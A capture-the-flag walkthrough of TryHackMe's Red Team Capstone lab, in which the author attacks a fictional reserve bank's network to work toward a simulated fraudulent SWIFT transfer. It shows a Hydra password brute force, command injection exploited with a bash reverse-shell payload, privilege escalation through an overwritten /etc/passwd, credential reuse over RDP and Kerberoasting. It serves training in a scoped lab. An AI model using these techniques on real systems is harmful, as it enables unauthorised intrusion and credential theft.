TryHackMe: Red Team Capstone Challenge

The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact. To best simulate how these engagements usually occur, there is no single right answer. Instead, multiple paths can be used to achieve the final goal.

Tested Learning Objectives

To solve this challenge successfully, the below-listed skills are pre-requisite.

  • OSINT (Simulated)
  • Enumeration & Fuzzing
  • Phishing
  • AV Evasion
  • Lateral Movement
  • AD Exploitation
  • Linux and Windows Security Testing
  • Privilege Escalation
  • Post-Compromise Exploitation

Project Overview

TryHackMe, a cybersecurity consultancy firm, has been approached by the government of Trimento to perform a red team engagement against their Reserve Bank (TheReserve). 

Trimento is an island country situated in the Pacific. While they may be small in size, they are by no means not wealthy due to foreign investment. Their reserve bank has two main divisions:

  • Corporate – The reserve bank of Trimento allows foreign investments, so they have a department that takes care of the country’s corporate banking clients.
  • Bank – The reserve bank of Trimento is in charge of the core banking system in the country, which connects to other banks around the world.

The Trimento government has stated that the assessment will cover the entire reserve bank, including both its perimeter and internal networks. They are concerned that the corporate division while boosting the economy, may be endangering the core banking system due to insufficient segregation. The outcome of this red team engagement will determine whether the corporate division should be spun off into its own company.

Project Goal

The purpose of this assessment is to evaluate whether the corporate division can be compromised and, if so, determine if it could compromise the bank division. A simulated fraudulent money transfer must be performed to fully demonstrate the compromise.

To do this safely, TheReserve will create two new core banking accounts for you. You will need to demonstrate that it’s possible to transfer funds between these two accounts. The only way this is possible is by gaining access to SWIFT, the core backend banking system.

Note: SWIFT (Society for Worldwide Interbank Financial Telecommunications) is the actual system that is used by banks for backend transfers. In this assessment, a core backend system has been created. However, for security reasons, intentional inaccuracies have been introduced into this process. If you wish to learn more about actual SWIFT and its security, feel free to go do some research! To put it in other words, the information that follows here has been made up.

To help you understand the project goal, the government of Trimento has shared some information about the SWIFT backend system. SWIFT runs in an isolated secure environment with restricted access. While the word impossible should not be used lightly, the likelihood of the compromise of the actual hosting infrastructure is so slim that it is fair to say that it is impossible to compromise this infrastructure.

However, the SWIFT backend exposes an internal web application at http://swift.bank.thereserve.loc/, which TheReserve uses to facilitate transfers. The government has provided a general process for transfers. To transfer funds:

  1. A customer makes a request that funds should be transferred and receives a transfer code.
  2. The customer contacts the bank and provides this transfer code.
  3. An employee with the capturer role authenticates to the SWIFT application and captures the transfer.
  4. An employee with the approver role reviews the transfer details and, if verified, approves the transfer. This has to be performed from a jump host.
  5. Once approval for the transfer is received by the SWIFT network, the transfer is facilitated and the customer is notified.

Separation of duties is performed to ensure that no single employee can both capture and approve the same transfer.

Project Scope

This section details the project scope.

In-Scope

  • Security testing of TheReserve’s internal and external networks, including all IP ranges accessible through your VPN connection.
  • OSINTing of TheReserve’s corporate website, which is exposed on the external network of TheReserve. Note, that this means that all OSINT activities should be limited to the provided network subnet, and no external internet OSINTing is required.
  • Phishing of any of the employees of TheReserve.
  • Attacking the mailboxes of TheReserve employees on the WebMail host (.11).
  • Using any attack methods to complete the goal of performing the transaction between the provided accounts.

Out-of-Scope

  • Security testing of any sites not hosted on the network.
  • Security testing of the TryHackMe VPN (.250) and scoring servers, or attempts to attack any other user connected to the network.
  • Any security testing on the WebMail server (.11) that alters the mail server configuration or its underlying infrastructure.
  • Attacking the mailboxes of other red teamers on the WebMail portal (.11).
  • External (internet) OSINT gathering.
  • Attacking any hosts outside of the provided subnet range. Once you have completed the questions below, your subnet will be displayed in the network diagram. This 10.200.X.0/24 network is the only in-scope network for this challenge.
  • Conducting DoS attacks or any attack that renders the network inoperable for other users.

Project Registration

The Trimento government mandates that all red teamers from TryHackMe participating in the challenge must register to allow their single point of contact for the engagement to track activities. As the island’s network is segregated, this will also provide the testers access to an email account for communication with the government and an approved phishing email address, should phishing be performed.

To register, you need to get in touch with the government through its e-Citizen communication portal that uses SSH for communication. Here are the SSH details provided:

SSH Usernamee-citizen
SSH Passwordstabilitythroughcurrency
SSH IPX.X.X.250

Once you complete the questions below, the network diagram at the start of the room will show the IP specific to your network. Use that information to replace the X values in your SSH IP.

Once you authenticate, you will be able to communicate with the e-Citizen system. Follow the prompts to register for the challenge, and save the information you get for future reference. Once registered, follow the instructions to verify that you have access to all the relevant systems.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ ssh e-citizen@10.200.113.250
e-citizen@10.200.113.250's password: 

Welcome to the e-Citizen platform!
Please make a selection:
[1] Register
[2] Authenticate
[3] Exit
Selection:1

Please provide your THM username: ishsome36
Creating email user
User has been succesfully created


=======================================
Thank you for registering on e-Citizen for the Red Team engagement against TheReserve.
Please take note of the following details and please make sure to save them, as they will not be displayed again.
=======================================
Username: ishsome36
Password: tZ1Zl-HpHts8F82Y
MailAddr: ishsome36@corp.th3reserve.loc
IP Range: 10.200.113.0/24
=======================================

The VPN server and the e-Citizen platform are not in scope for this assessment, and any security testing of these systems may lead to a ban from the challenge.

As you make your way through the network, you will need to prove your compromises. To do that, you will be requested to perform specific steps on the host that you have compromised. Please note the hostnames in the network diagram above, as you will need this information. Flags can only be accessed from matching hosts, so even if you have higher access, you will need to lower your access to the specific host required to submit the flag.

Submitting the Flags

To submit the proof of compromise, connect to the e-citizen platform via SSH and select option 2 to authenticate. Use the credentials provided during the registration to authenticate. After successfully authenticating, you will see more options.

We need to select the option that suits us best based on the hosts we compromised. For example, if we select the option [1] here, it will ask for the hostname we compromised. The further instructions will tell us how to submit the proof of compromise. Once the proof is submitted, we will get the flag value in our email.

If you don’t want to set up an email client, you can make use of the Roundcube Webmail app at http://mail.thereserve.loc/index.php and use the credentials provided during registration to log in.

Once the registration part is done, we can see the hosts and their IP addresses show up on the network diagram.

Let’s add these hosts to our /etc/hosts file.

10.200.113.250 ecitizen.thm
10.200.113.13 web.thereserve.loc
10.200.113.12 vpn.thereserve.loc
10.200.113.11 mail.thereserve.loc

Exploiting the External Network

OSINT on WEB Machine

We will start by running an NMAP scan on the machine to find open ports and services running.

NMAP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fe:ee:07:c6:b9:a4:90:5f:ca:71:c8:b6:7b:71:f7:ac (RSA)
|   256 ca:9d:c8:e4:62:24:56:b2:f6:52:de:de:57:63:ab:fe (ECDSA)
|_  256 7d:21:b1:c5:04:65:2a:ba:18:20:3c:d2:1d:e4:16:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have only two ports open:

  • 22 for SSH
  • 80 for HTTP

Since we do not have credentials to connect via SSH, we can move on to enumerating the web server on port 80.

HTTP

The landing page is the homepage for the TheReserv Bank of Trimento. Going to Meet The Team tab, we see some of the users are listed here.

By opening the picture in a new tab, we see the naming convention of the (potential) domain users.

If we go to /images directory, we can see a list of all the users.

Based on this list, we can create a user list that we can use later to enumerate or carry out other attacks such as password spraying and brute-forcing.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ cat emails.txt    
antony.ross@corp.thereserve.loc
ashley.chan@corp.thereserve.loc
brenda.henderson@corp.thereserve.loc
charlene.thomas@corp.thereserve.loc
christopher.smith@corp.thereserve.loc
emily.harvey@corp.thereserve.loc
keith.allen@corp.thereserve.loc
laura.wood@corp.thereserve.loc
leslie.morley@corp.thereserve.loc
lynda.gordon@corp.thereserve.loc
martin.savage@corp.thereserve.loc
mohammad.ahmed@corp.thereserve.loc
paula.bailey@corp.thereserve.loc
rhys.parsons@corp.thereserve.loc
roy.sims@corp.thereserve.loc

The Contact Us page has a couple of more usernames. We will add them to our list.

We have gathered some useful data from the web server. The usernames/emails could be domain users and we can use them on other machines to perform different attacks.

Mail Machine

We will again start by running NMAP on this machine. From the network diagram, we can see that this is a Windows host and connected directly to the Domain. If we can enumerate and gather any interesting information, we should be able to get a foothold on the network.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/Mail]
└─$ nmap -p- mail.thereserve.loc -A nmap/mail-fullscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 11:14 CST
Unable to split netmask from target expression: "nmap/mail-fullscan"
Nmap scan report for mail.thereserve.loc (10.200.113.11)
Host is up (0.21s latency).
Not shown: 65513 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 f3:6c:52:d2:7f:e9:0e:1c:c1:c7:ac:96:2c:d1:ec:2d (RSA)
|   256 c2:56:3c:ed:c4:b0:69:a8:e7:ad:3c:31:05:05:e9:85 (ECDSA)
|_  256 d3:e5:f0:73:75:d5:20:d9:c0:bb:41:99:e7:af:a0:00 (ED25519)
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: NAMESPACE IDLE completed CAPABILITY IMAP4 SORT QUOTA CHILDREN RIGHTS=texkA0001 ACL OK IMAP4rev1
445/tcp   open  microsoft-ds?
587/tcp   open  smtp          hMailServer smtpd
| smtp-commands: MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp  open  mysql         MySQL 8.0.31
| ssl-cert: Subject: commonName=MySQL_Server_8.0.31_Auto_Generated_Server_Certificate
| Not valid before: 2023-01-10T07:46:11
|_Not valid after:  2033-01-07T07:46:11
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.31
|   Thread ID: 83
|   Capabilities flags: 65535
|   Some Capabilities: SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, IgnoreSpaceBeforeParenthesis, ODBCClient, FoundRows, IgnoreSigpipes, Support41Auth, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, LongColumnFlag, LongPassword, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: \x0D&QZ\x10\x05:S\x0Bl]-b\x0E7\x1C,\8\x1D
|_  Auth Plugin Name: caching_sha2_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THERESERVE
|   NetBIOS_Domain_Name: THERESERVE
|   NetBIOS_Computer_Name: MAIL
|   DNS_Domain_Name: thereserve.loc
|   DNS_Computer_Name: MAIL.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-02-06T17:42:18+00:00
| ssl-cert: Subject: commonName=MAIL.thereserve.loc
| Not valid before: 2024-02-04T20:25:58
|_Not valid after:  2024-08-05T20:25:58
|_ssl-date: 2024-02-06T17:42:28+00:00; -1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe: 
|     Invalid message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=2/6%Time=65C26F44%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\
SF:0\0\x0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(RTSPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05
SF:\x1a\0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0
SF:\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(SSLSes
SF:sionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'
SF:\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,9,"\x05\
SF:0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\
SF:0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e
SF:\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Fo
SF:urOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9,"\x05\0
SF:\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a
SF:\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000"
SF:)%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0
SF:\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a
SF:\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\
SF:x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20mess
SF:age\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSReque
SF:st,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid\x20message-frame
SF:\.\"\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: Host: MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-06T17:42:19
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

We have quite a few ports open but these are most interesting to us:

  • 22 for SSH
  • 25/587 SMTP
  • 139/445 for SMB
  • 80 for HTTP
  • 3389 for RDP
  • 33060 for MySQL

We will need credentials to interact with most of the open services. Let’s start with HTTP and see what is running on it.

HTTP

Going to the FQDN address, we get a 403- Forbidden status.

But using the IP, we see a default page for the Microsoft IIS Server. But this does not mean that we have nothing else to explore here. There might be hidden directories for this web server which we can enumerate using tools like GoBuster.

GoBuster

GoBuster was able to find some hidden directories. The /index.php page has a login page for the Roundcube Webmail app.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ gobuster dir -u http://mail.thereserve.loc -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://mail.thereserve.loc
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 5345]
/skins                (Status: 301) [Size: 156] [--> http://mail.thereserve.loc/skins/]
/plugins              (Status: 301) [Size: 158] [--> http://mail.thereserve.loc/plugins/]
/program              (Status: 301) [Size: 158] [--> http://mail.thereserve.loc/program/]
/Index.php            (Status: 200) [Size: 5345]
/vendor               (Status: 301) [Size: 157] [--> http://mail.thereserve.loc/vendor/]
RoundCube Webmail

Roundcube Webmail is a browser-based multilingual IMAP client with an application-like user interface. It provides the full functionality you expect from an email client, including MIME support, address book, folder management, message searching, and spell checking. Roundcube Webmail is written in PHP and requires the MySQL, PostgreSQL, or SQLite database. With its plugin API, it is easily extendable and the user interface is fully customizable using skins.

We only have potential usernames for the login so we cannot login. We can try to brute-force the SMTP port using Hydra and might be able to find matching passwords for the users.

SMTP Brute-Force

For this brute-force attack, we will use the password list provided to us under lab resources.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ hydra -L emails.txt -P passwords.lst mail.thereserve.loc smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-06 11:13:28
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 15120 login tries (l:18/p:840), ~945 tries per task
[DATA] attacking smtp://mail.thereserve.loc:25/
[STATUS] 1004.00 tries/min, 1004 tries in 00:01h, 14116 to do in 00:15h, 16 active
[STATUS] 1023.33 tries/min, 3070 tries in 00:03h, 12050 to do in 00:12h, 16 active
[STATUS] 1034.14 tries/min, 7239 tries in 00:07h, 7881 to do in 00:08h, 16 active
[25][smtp] host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[25][smtp] host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
[STATUS] 1114.75 tries/min, 13377 tries in 00:12h, 1743 to do in 00:02h, 16 active
[STATUS] 1107.85 tries/min, 14402 tries in 00:13h, 718 to do in 00:01h, 16 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-06 11:27:17

Luckily, we found two sets of credentials! We can use them now and try logging in to the Webmail app. Oftentimes, getting access to user mailboxes can be very useful as there are high chances of finding sensitive information in them.

Unfortunately, both user inboxes are empty. We can still make use of this access to carry out further attacks such as Phishing. We can send Phishing emails to steal sensitive information from other users such as their credentials. We can also try to catch a shell on their machine by weaponizing the Phishing email with a malicious executable payload. When the user clicks on the malicious file, we get a shell on the machine.

For now, we will move on to enumerate other machines and come back to Phishing if we can’t find a way to get a foothold on the network.

VPN Machine

Out of three hosts with potential entry points to the network, we have enumerated and gathered information from the WEB and MAIL machines. We will start an NMAP scan on the VPN machine to find out open ports and services running.

NMAP

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ nmap -p- vpn.thereserve.loc -A nmap/vpn-fullscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 11:58 CST
Unable to split netmask from target expression: "nmap/vpn-fullscan"
Nmap scan report for vpn.thereserve.loc (10.200.113.12)
Host is up (0.20s latency).
Not shown: 65525 closed tcp ports (conn-refused)
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:08:13:2d:6b:a2:0d:9b:97:4b:54:7e:ac:5d:29:a7 (RSA)
|   256 13:13:fb:37:7e:4e:ec:f2:b8:0e:13:74:75:32:c2:10 (ECDSA)
|_  256 de:f8:5c:79:45:d3:b2:77:0b:31:0a:7e:14:3c:82:37 (ED25519)
80/tcp    open     http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: VPN Request Portal
|_http-server-header: Apache/2.4.29 (Ubuntu)

We have only two ports open:

  • 22 for SSH
  • 80 for HTTP

Trying SSH on the VPN machine using the credentials we obtained won’t work. We will move on to Port 80.

HTTP

The web page has a login form for the VPN server. Fortunately, the credentials we have for laura.wood@thereserve.loc and mohammad.ahmed@thereserve.loc works here!

GoBuster

GoBuster was able to find a directory /vpn. Visiting the directory, we see a OpenVPN file. We can download the file and read it.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ gobuster dir -u http://vpn.thereserve.loc -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://vpn.thereserve.loc
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/vpn                  (Status: 301) [Size: 322] [--> http://vpn.thereserve.loc/vpn/]

This seems like a default template for the OpenVPN file. We cannot make use of it since there is no remote IP information so we won’t be able to connect to a VPN server.

After logging in with the credentials we found, we can click on the submit button by typing a username and it downloads an OpenVPN file with the username we typed.

On comparing the file that we just downloaded with the template, we noticed that this file has remote IP information–which means we can use the file to connect to a VPN server.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ head corpUsername.ovpn                       
client
dev tun
proto tcp
sndbuf 0
rcvbuf 0
remote 10.200.X.X 1194
resolv-retry infinite
nobind
persist-key
persist-tun
                                                                                                   
┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ head laura.wood@corp.thereserve.loc.ovpn 
client
dev tun
proto tcp
sndbuf 0
rcvbuf 0
remote 10.200.113.12 1194
resolv-retry infinite
nobind
persist-key
persist-tun

Connecting via laura.wood file, we did not see anything interesting in the output but with mohammad.ahmed, we see a couple of new IPs. These IPs are automatically added to our route.

Foothold on VPN Machine

To understand how the web server is downloading the files from the back end, we can try to capture the requets using BurpSuite and analyze the responses.

Looking at the response, it seems like the server appends the .ovpn extension to anything we search for. Carrying out a Path/Directory Traversal attack might not be the best option for us here.

The Server does the same when we try to inject a command such as id or whoami into the filename parameter. After trying out different command injection techniques, we found out that it is vulnerable to blind Command Injection. By running the sleep command, the server waits for the number of seconds we specify before sending us the response.

With confidence that it is vulnerable to command injection, we can send a reverse shell payload and try to catch a shell on our attack machine.

bash -i >& /dev/tcp/10.50.110.229/443 0>&1

# URL encoded
%26%26+bash+-i+>%26+/dev/tcp/10.50.110.229/443+0>%261

We will send the above payload and start a Netcat listener to catch the shell.

Great! We got the shell on the VPN machine.

Connecting to MySQL

In the /var/www/html directory, we notice that there is a Database connection configuration file. These files contain credentials to the databases. Reading the file, we do see the credentials to connect to the MySQL server.

www-data@ip-10-200-113-12:/var/www/html$ cat db_connect.php 
<?php

define('DB_SRV', 'localhost');
define('DB_PASSWD', "password1!");
define('DB_USER', 'vpn');
define('DB_NAME', 'vpn');

$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);

if($connection == false){

	die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>

From the VPN machine itself, we can connect via MySQL and check out the database.

www-data@ip-10-200-113-12:/var/www/html$ mysql -u vpn -p

The vpn database has a users table that contains a set of credentials for the user lisa.moore. We will add these credentials to our list of found credentials and use them later if needed.

Privilege Escalation

The VPN machine is our foothold on the network. We can set up pivoting and interact with the machines on the Internal network directly from our kali (attack) machine. Getting the root access will give us elevated privileges on the machine and if needed we will be able to install/compile/run the tools without any restrictions.

For Pivoting, privilege escalation is not required. We will try to compromise as much as we can to showcase the vulnerabilities and misconfigurations on the machine.

Checking for the SUDO permissions, we notice that the user www-data can run a bash script and cp binary with elevated access. We can make use of this to our advantage and get root access.

The cp binary is used to copy files. We are currently www-data user who is a default user for web servers and does not have any elevated privileges by default. But with SUDO permissions on the cp binary, we can copy any files that only root the user can access and read them.

One easy way to become root on the machine using the SUDO permissions on /bin/cp is to modify the /etc/passwd file. We will first copy the passwd file to /tmp directory, add our own user with root privileges, and then copy the file back to its original path.

We will create a hash in the format that is required by the passwd file.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ openssl passwd -1 -salt ignite pass123
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1

Now, we append our user hash to the passwd file,

The final step is to copy the file back to its original place.

We were able to replace the file and switch to our newly created user. We can also see that we have root privileges on the machine now.

Ping Sweep

We have NMAP already installed on the VPN machine. Since this machine can talk to the Internal network, we can quickly run a ping sweep and find all the active hosts on the network.

root@ip-10-200-113-12:~# nmap -sn 10.200.113.0/24 

We found the IP addresses for the hosts.

10.200.113.11 Webmail
10.200.113.12 VPN
10.200.113.13 WEB
10.200.113.21 WRK1
10.200.113.22 WRK2
10.200.113.31
10.200.113.32
10.200.113.51
10.200.113.52
10.200.113.61
10.200.113.100
10.200.113.101
10.200.113.102 CORPDC
10.200.113.201

If we recall, we found the .21 and .22 hosts from the OpenVPN connection for mohammad.ahmed. We can also see that we have more hosts active on our network map. We will start enumerating them but first, we need to set up pivoting.

Pivoting Setup

We will use Chisel to set up Pivoting. Our Kali (attack) machine will serve as a server and the VPN machine will act as a client. We should be able to interact with the machines in the internal network directly from our machine after setting up pivoting.

On our Machine:

On VPN Machine:

Breaching the Perimeter

WRK1 Machine

We will begin by running an NMAP scan to find the open ports and services.

NMAP

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/WRK1]
└─$ nmap -p22,135,139,445,3389 WRK1.corp.thereserve.loc -A -oN nmap/wrk1-fullscan -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 12:12 CST
Nmap scan report for WRK1.corp.thereserve.loc (10.200.113.21)
Host is up (0.52s latency).

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 21:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f (RSA)
|   256 e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a (ECDSA)
|_  256 bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58 (ED25519)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-06T18:13:47+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
| Not valid before: 2024-02-04T20:26:11
|_Not valid after:  2024-08-05T20:26:11
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WRK1
|   DNS_Domain_Name: corp.thereserve.loc
|   DNS_Computer_Name: WRK1.corp.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-02-06T18:13:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-06T18:13:08
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Since RDP is open, we can try connecting with the credentials we have. We can see that we are successfully able to RDP into the WRK1 machine. The same credentials work on the WRK2 machine as well.

At this point, we can submit the proof of compromises and receive the first four flags. Please refer to the section Submitting the Flags above to see the instructions on connecting to e-citizen platform and submitting the proof of compromise.

The credentials we have does not work on the Server1 and Server2 machines. We will next try using Kerberoasting attack on the Server machines.

Kerberoasting

Kerberoasting is a technique used in cybersecurity attacks to exploit weaknesses in the Kerberos authentication protocol, which is commonly used in Windows Active Directory environments for user authentication. In Kerberoasting attacks, an attacker targets service accounts that use Kerberos to authenticate, such as database or application service accounts.

The attack works by requesting a ticket-granting service (TGS) ticket for a target service account from the Key Distribution Center (KDC) in the Active Directory domain. These service accounts often have a Service Principal Name (SPN) associated with them, which is used for Kerberos authentication. Once the TGS ticket is obtained, the attacker can attempt to crack the ticket’s encryption to extract the account’s password hash.

Once the password hash is obtained, the attacker can then attempt to crack it using offline password-cracking techniques, such as dictionary attacks or brute force attacks. If successful, the attacker gains access to the service account’s credentials, which can be used to further escalate privileges within the network.

